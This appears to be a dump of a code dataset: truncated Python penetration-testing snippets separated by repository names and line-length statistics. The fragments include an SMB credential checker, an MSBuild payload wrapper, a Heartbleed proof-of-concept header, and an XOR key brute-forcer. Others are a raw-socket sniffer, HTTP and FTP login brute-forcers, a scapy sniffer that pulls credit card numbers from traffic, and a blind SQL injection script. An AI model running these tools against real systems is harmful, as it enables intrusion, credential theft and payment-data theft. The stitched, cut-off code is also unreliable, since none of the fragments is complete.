repo_name
stringclasses
29 values
text
stringlengths
18
367k
avg_line_length
float64
5.6
132
max_line_length
int64
11
3.7k
alphnanum_fraction
float64
0.28
0.94
Python-Penetration-Testing-Cookbook
import socket s = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_TCP) while True: print(s.recvfrom(65565))
20
70
0.752
PenetrationTestingScripts
#coding=utf-8 import threading from printers import printPink,printRed,printGreen from multiprocessing.dummy import Pool import requests import socket import httplib import time import urlparse import urllib2 import re import base64 class web_burp(object): def __init__(self,c): self.config=c self...
33.758333
125
0.498801
PenetrationTestingScripts
#!/usr/bin/env python # -*- coding: utf-8 -*- # @Author : jeffzhang # @Time : 18-5-10 # @File : authenticate.py # @Desc : "" from flask import Blueprint, render_template, request, redirect, url_for, Flask, session from instance import config from functools import wraps authenticate = Blueprint('authenticate...
30.135593
88
0.599673
Python-Penetration-Testing-Cookbook
# This package will contain the spiders of your Scrapy project # # Please refer to the documentation for information on how to create and manage # your spiders.
31.4
79
0.78882
cybersecurity-penetration-testing
#!/usr/bin/python # -*- coding: utf-8 -*- import re import optparse from scapy.all import * def findCreditCard(pkt): raw = pkt.sprintf('%Raw.load%') americaRE = re.findall('3[47][0-9]{13}', raw) masterRE = re.findall('5[1-5][0-9]{14}', raw) visaRE = re.findall('4[0-9]{12}(?:[0-9]{3})?', raw) if a...
24.44186
64
0.585544
PenetrationTestingScripts
#coding=utf-8 import time import threading from multiprocessing.dummy import Pool from printers import printPink,printGreen from ftplib import FTP class ftp_burp(object): def __init__(self,c): self.config=c self.lock=threading.Lock() self.result=[] self.lines=self.config.file2list...
30.402597
125
0.522962
cybersecurity-penetration-testing
class Solution(object): # def findShortestSubArray(self, nums): # """ # :type nums: List[int] # :rtype: int # """ # res = len(nums) # counter = collections.Counter() # for num in nums: # counter[num] += 1 # degree = max(counter.values()) ...
28.809524
70
0.46283
cybersecurity-penetration-testing
import struct import logging from helper import utility from Registry import Registry __author__ = 'Preston Miller & Chapin Bryce' __date__ = '20160401' __version__ = 0.04 __description__ = 'This scripts parses the UserAssist Key from NTUSER.DAT.' # KEYS will contain sub-lists of each parsed UserAssist (UA) key KE...
36.48062
111
0.597021
cybersecurity-penetration-testing
import requests import sys url = sys.argv[1] yes = sys.argv[2] answer = [] i = 1 asciivalue = 1 letterss = [] print "Kicking off the attempt" payload = {'injection': '\'AND char_length(password) = '+str(i)+';#', 'Submit': 'submit'} while True: req = requests.post(url, data=payload) lengthtest = req.text if yes i...
20.69697
112
0.653147
Python-Penetration-Testing-for-Developers
#!/usr/bin/env python ''' Author: Christopher Duffy Date: April 2015 Name: headrequest.py Purpose: To identify live web applications out extensive IP ranges Copyright (c) 2015, Christopher Duffy All rights reserved. Redistribution and use in source and binary forms, with or without modification, are permitted provid...
41.354167
151
0.666667
cybersecurity-penetration-testing
#!/usr/bin/python # # Simple XOR brute-force Key recovery script - given a cipher text, plain text and key length # it searches for proper key that could decrypt cipher into text. # # Mariusz Banach, 2016 # import sys def xorstring(s, k): out = [0 for c in range(len(s))] key = [] if type(k) == type(int): ...
25.678161
94
0.548707
cybersecurity-penetration-testing
# Transposition Cipher Encryption # http://inventwithpython.com/hacking (BSD Licensed) import pyperclip def main(): myMessage = 'Common sense is not so common.' myKey = 8 ciphertext = encryptMessage(myKey, myMessage) # Print the encrypted string in ciphertext to the screen, with # a ...
30.111111
76
0.642602
Python-Penetration-Testing-for-Developers
import requests import sys url = sys.argv[1] values = [] for i in xrange(100): r = requests.get(url) values.append(int(r.elapsed.total_seconds())) average = sum(values) / float(len(values)) print "Average response time for "+url+" is "+str(average)
20.25
58
0.69685
cybersecurity-penetration-testing
#!/usr/bin/env python ''' Author: Christopher Duffy Date: March 2015 Name: msfrpc_smb.py Purpose: To scan a network for a smb ports and validate if credentials work on the target host Copyright (c) 2015, Christopher Duffy All rights reserved. Redistribution and use in source and binary forms, with or without modifica...
43.116667
172
0.626806
Hands-On-Penetration-Testing-with-Python
#!/usr/bin/python3.5 from shape import area_finder as AF def find_area():
6.636364
35
0.650602
Effective-Python-Penetration-Testing
Import peutils Import pefile pe = pefile.PE('md5sum-packed.exe') signatures = peutils.SignatureDatabase('http://reverse-engineering-scripts.googlecode.com/files/UserDB.TXT') matches = signatures.match(pe, ep_only = True) print matches
28.625
108
0.788136
cybersecurity-penetration-testing
# This package will contain the spiders of your Scrapy project # # Please refer to the documentation for information on how to create and manage # your spiders.
31.4
79
0.78882
cybersecurity-penetration-testing
#!/usr/bin/python3 # # Red-Teaming script that will leverage MSBuild technique to convert Powershell input payload or # .NET/CLR assembly EXE file into inline-task XML file that can be further launched by: # # %WINDIR%\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe # or # %WINDIR%\Microsoft.NET\Framework64\v4.0.303...
36.081448
269
0.577083
PenTesting
#!/usr/bin/env python2 # Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford (jspenguin@jspenguin.org) # The author disclaims copyright to this source code. import sys import struct import socket import time import select import re from optparse import OptionParser options = OptionParser(usage='%prog se...
30.176471
122
0.576641